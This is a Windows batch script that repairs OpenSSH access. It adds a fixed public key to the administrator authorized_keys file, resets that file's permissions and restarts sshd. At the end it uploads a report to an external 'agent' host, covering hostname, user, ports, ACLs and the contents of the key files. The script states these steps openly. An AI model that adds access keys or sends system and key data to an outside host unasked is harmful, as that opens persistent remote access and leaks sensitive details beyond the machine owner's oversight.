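@echo off
setlocal EnableDelayedExpansion

REM ============================================================
REM Phase 7.x SSH-Verify + ACL-Fix
REM
REM Checks why SSH auth is being rejected and repairs the ACL on
REM administrators_authorized_keys (mandatory for Windows OpenSSH:
REM sshd ignores the file unless only SYSTEM + Administrators have
REM access to it).
REM
REM Pubkey that MUST be present:
REM   ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHHnVdZo59KSZ7R8T7cN+AFXx5nMd06vq/5nx36xVX2X
REM
REM Right-click -> "Als Administrator ausfuehren" (UAC: Ja)
REM
REM What this script changes on the machine:
REM   - appends the pubkey above to administrators_authorized_keys
REM     if it is not already there
REM   - resets that file's ACL to SYSTEM + Administrators only
REM   - restarts the sshd service
REM What leaves the machine: the whole report file (hostname, user,
REM sshd state, listen ports, ACLs and the CONTENT of both
REM authorized_keys files) is POSTed to https://AGENT_HOST/submit
REM in the "Auto-Send" step at the end.
REM ============================================================

set "OUTFILE=%USERPROFILE%\Desktop\PHASE7X_SSH_VERIFY.txt"
set "AGENT_HOST=bridge.xxbillion.ai"
set "SSHDIR=C:\ProgramData\ssh"
set "ADMINKEYS=%SSHDIR%\administrators_authorized_keys"
set "USERKEYS=%USERPROFILE%\.ssh\authorized_keys"
set "EXPECTED_PUBKEY=AAAAC3NzaC1lZDI1NTE5AAAAIHHnVdZo59KSZ7R8T7cN+AFXx5nMd06vq/5nx36xVX2X"
set "KEY_COMMENT=linux-host-to-windows-workstation-01"

REM Well-known SIDs instead of account names: icacls resolves these on
REM every Windows locale. "BUILTIN\Administrators" does not resolve on a
REM localized install (German: "Administratoren"), in which case the
REM grant fails, sshd keeps rejecting the file and the report only
REM shows an icacls error.
set "SID_SYSTEM=*S-1-5-18"
set "SID_ADMINS=*S-1-5-32-544"
set "SID_USERS=*S-1-5-32-545"
set "SID_AUTHUSERS=*S-1-5-11"

REM Elevation check. Writing under C:\ProgramData\ssh, icacls on that
REM file and net stop/start all need an admin token; without it every
REM step below "fails" into the report and the diagnosis is misleading.
REM "net session" returns non-zero when not elevated.
net session >nul 2>&1
if errorlevel 1 (
    echo FEHLER: Nicht als Administrator gestartet - bitte Rechtsklick, "Als Administrator ausfuehren".
    pause
    exit /b 1
)

echo. > "%OUTFILE%"
echo ============================================ >> "%OUTFILE%"
echo Phase 7.x SSH-Verify + ACL-Fix >> "%OUTFILE%"
echo Datum: %DATE% %TIME% >> "%OUTFILE%"
echo Host : %COMPUTERNAME% >> "%OUTFILE%"
echo User : %USERDOMAIN%\%USERNAME% >> "%OUTFILE%"
echo ============================================ >> "%OUTFILE%"
echo. >> "%OUTFILE%"

echo --- 1. sshd Service Status --- >> "%OUTFILE%"
sc query sshd >> "%OUTFILE%" 2>&1
echo. >> "%OUTFILE%"

echo --- 2. SSH Listen-Port --- >> "%OUTFILE%"
REM Plain "|" here: at top level "^|" escapes the pipe, so netstat
REM received "|" and "findstr" as arguments instead of being piped.
REM The redirections apply to findstr, which is the stage we want logged.
netstat -an | findstr ":22 " >> "%OUTFILE%" 2>&1
echo. >> "%OUTFILE%"

echo --- 3. administrators_authorized_keys vorhanden? --- >> "%OUTFILE%"
if exist "%ADMINKEYS%" (
    echo Datei existiert: %ADMINKEYS% >> "%OUTFILE%"
    echo Groesse + ACL: >> "%OUTFILE%"
    dir "%ADMINKEYS%" >> "%OUTFILE%" 2>&1
    icacls "%ADMINKEYS%" >> "%OUTFILE%" 2>&1
    echo Inhalt: >> "%OUTFILE%"
    type "%ADMINKEYS%" >> "%OUTFILE%" 2>&1
) else (
    echo NICHT VORHANDEN: %ADMINKEYS% >> "%OUTFILE%"
)
echo. >> "%OUTFILE%"

echo --- 4. user authorized_keys vorhanden? --- >> "%OUTFILE%"
if exist "%USERKEYS%" (
    type "%USERKEYS%" >> "%OUTFILE%" 2>&1
) else (
    echo NICHT VORHANDEN: %USERKEYS% >> "%OUTFILE%"
)
echo. >> "%OUTFILE%"

echo --- 5. Expected pubkey check --- >> "%OUTFILE%"
REM KEY_PRESENT=1 only if the file exists AND contains the key material.
REM findstr /C: matches the literal string, so "+" and "/" in the base64
REM need no escaping.
set "KEY_PRESENT=0"
if exist "%ADMINKEYS%" (
    findstr /C:"%EXPECTED_PUBKEY%" "%ADMINKEYS%" >nul 2>&1
    if !ERRORLEVEL! EQU 0 set "KEY_PRESENT=1"
)
REM The empty "echo." before the key guarantees the new entry starts on
REM its own line even if the existing file has no trailing newline;
REM sshd ignores blank lines in authorized_keys, so an extra one is harmless.
REM The key line is echoed inside parentheses so no trailing space is
REM written after the comment field.
if "!KEY_PRESENT!"=="1" (
    echo OK: Pubkey ist in administrators_authorized_keys >> "%OUTFILE%"
) else (
    echo FEHLT: Pubkey ist NICHT in administrators_authorized_keys -- wird jetzt geschrieben >> "%OUTFILE%"
    if not exist "%SSHDIR%" mkdir "%SSHDIR%" >nul 2>&1
    echo.>> "%ADMINKEYS%"
    (echo ssh-ed25519 %EXPECTED_PUBKEY% %KEY_COMMENT%)>> "%ADMINKEYS%"
    echo Neu geschrieben: >> "%OUTFILE%"
    type "%ADMINKEYS%" >> "%OUTFILE%" 2>&1
)
echo. >> "%OUTFILE%"

echo --- 6. ACL auf administrators_authorized_keys reparieren --- >> "%OUTFILE%"
REM Windows OpenSSH requirement: ONLY SYSTEM and Administrators may access
REM the file. Drop inherited ACEs first, then grant the two principals,
REM then remove any explicit Users / Authenticated Users entries; otherwise
REM sshd ignores the file. A /remove of an entry that is not present is
REM reported by icacls but is not an error for us.
icacls "%ADMINKEYS%" /inheritance:r >> "%OUTFILE%" 2>&1
icacls "%ADMINKEYS%" /grant "%SID_SYSTEM%:F" >> "%OUTFILE%" 2>&1
icacls "%ADMINKEYS%" /grant "%SID_ADMINS%:F" >> "%OUTFILE%" 2>&1
icacls "%ADMINKEYS%" /remove "%SID_USERS%" >> "%OUTFILE%" 2>&1
icacls "%ADMINKEYS%" /remove "%SID_AUTHUSERS%" >> "%OUTFILE%" 2>&1
echo ACL nach Fix: >> "%OUTFILE%"
icacls "%ADMINKEYS%" >> "%OUTFILE%" 2>&1
echo. >> "%OUTFILE%"

echo --- 7. sshd neu starten damit ACL-Change greift --- >> "%OUTFILE%"
REM "net stop" on a service that is not running logs an error but is
REM harmless; "net start" below is what matters.
net stop sshd >> "%OUTFILE%" 2>&1
net start sshd >> "%OUTFILE%" 2>&1
echo. >> "%OUTFILE%"

echo --- 8. Final sshd-Status --- >> "%OUTFILE%"
sc query sshd >> "%OUTFILE%" 2>&1
echo. >> "%OUTFILE%"

echo ============================================ >> "%OUTFILE%"
echo ENDE - bitte kurz warten + ich teste Connect >> "%OUTFILE%"
echo ============================================ >> "%OUTFILE%"

type "%OUTFILE%"

echo.
echo --- Auto-Send an Agent ---
REM Uploads the complete report above (including authorized_keys
REM content and ACLs) to the agent host over HTTPS. Invoke-RestMethod
REM validates the server certificate by default; a failure is printed
REM but does not abort the script. NOTE(review): the path is embedded
REM in single quotes, so a USERPROFILE containing "'" would break the
REM PowerShell command - confirm that cannot occur here.
powershell -NoProfile -ExecutionPolicy Bypass -Command "try { $b = Get-Content -Raw -Encoding UTF8 -Path '%OUTFILE%'; $r = Invoke-RestMethod -Method POST -Uri 'https://%AGENT_HOST%/submit' -ContentType 'text/plain; charset=utf-8' -Body $b -TimeoutSec 15; Write-Host ('OK -- Agent hat es: id=' + $r.id) -ForegroundColor Green } catch { Write-Host ('FEHLER Auto-Send: ' + $_.Exception.Message) -ForegroundColor Red }"

echo.
echo Tunnel-Restart noetig damit sshd-Restart nicht den Tunnel zerreisst:
echo   Doppelklick PHASE7X_REVERSE_TUNNEL.cmd nochmal
echo.
pause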
